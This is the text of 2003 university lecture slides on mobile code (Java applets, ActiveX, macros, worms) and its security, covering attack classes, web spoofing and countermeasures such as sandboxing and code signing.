Mobile Code and Worms

By

Mitun Sinha

Pandurang Kamat

04/16/2003

Mobile Code

And Mobile Code Security

Part I

What is mobile code?

First, What Is Code?

Code is a series of commands, and (usually) contains no or little information.

Code can be executed, and running code most often requires some outside information (data) to work on.

Programs, applications, operating systems, games, calculators, media players, word processors and viruses are examples of code.

Resumes, pictures, videos, music, lists of numbers, and your ex-girlfriend’s social security number are examples of data.

And how is it different from data?

Today, we constantly download or make web pages, movies, music and pictures then send them to friends and family. Data has definitely been successfully mobilized.

If I download Half-life, install and play it on my computer, then FTP it to a friend so he can install and play it*, could we then say that Half-life counts as mobile code?

Enter the Internet

* Legal battle with Sierra sold seperately

Mobile code is…

a general term used to refer to processes (executable code) that migrate and execute at remote hosts

any code that is specifically designed to be able to transport itself from one machine to another

Mobile code is…

a general term used to refer to processes (executable code) that migrate and execute at remote hosts

any code that is specifically designed to be able to transport itself from one machine to another

Mobile code is…

able to transport itself

fairly autonomous

often platform-independent

code that is moved from one host to another with or without interaction with the user

Examples of mobile code

Java applets and Java scripts ActiveX controls Visual Basic macros and scripts Dynamic e-mail Viruses, trojan horses, worms The agents in The Matrix

Instead of moving large amounts of data around, move the computation to the data.

Add functionality anywhere anytime

Make distributed systems simpler, more flexible

Natural for network software

What is mobile code good for?

Every rose…

What is the problem with mobile code?

SECURITY

Part II

Mobile Code Security

A Tale of Two Problems

Malicious Code Problem

Malicious Host Problem

Malicious Code Problem

Mobile code that arrives at your workstation and intentionally or unintentionally causes you harm

Four attack classes: – invasion of privacy– denial of service – antagonism– system modification

Example?

Antagonism– meant to annoy or show off– no real damage to files or system– display of unwanted graphics or text

System modification– deletion of data or system files– capturing hard drive space – for e.g.

to host shareware server

Example?

Invasion of privacy– read surfing history– read directory listings– steal files

Denial of service– re-aim browser– stealing CPU cycles– Web spoofing

Web Spoofing - example Steal control of user’s view of web and

simulate normal operation Classic man-in-the-middle attack

Mobile code is smart

A firewall attempts to “block” Java in HTML by scanning port 80 (HTTP port) for the <APPLET> tag

Javascript can dynamically construct the <APPLET> tag once past the firewall

Counter-measures

Java applets and Java scripts ActiveX controls Visual Basic macros and scripts Dynamic e-mail Viruses, trojan horses, worms The agents in The Matrix

Examples of mobile code

Microsoft’s security (Yeah right!) Internet site zones of trust ActiveX control signing and marking Macro signing Attachment warnings

SUN’s JAVA 2 Security Identity

– Origin– Signature – not same as origin!

Policy – Set by user(!!) or system administrator (still

bad) Good ol’ Sandboxing Signatures use variation of X.509v3

Trusted third party that allows developers to digital sign their code

Consumers can feel safe in knowing that signed code is safe and has not been altered or tampered with – IF they trust the third party

Verisign Digital Signing

Verisign Digital Signing

Verisign works with:- Microsoft Authenticode and VBA- Netscape Object Signing- Sun Java signing

Techniques used include industry-standard cryptographic methods learnt in class – like RSA and PKI

Questions?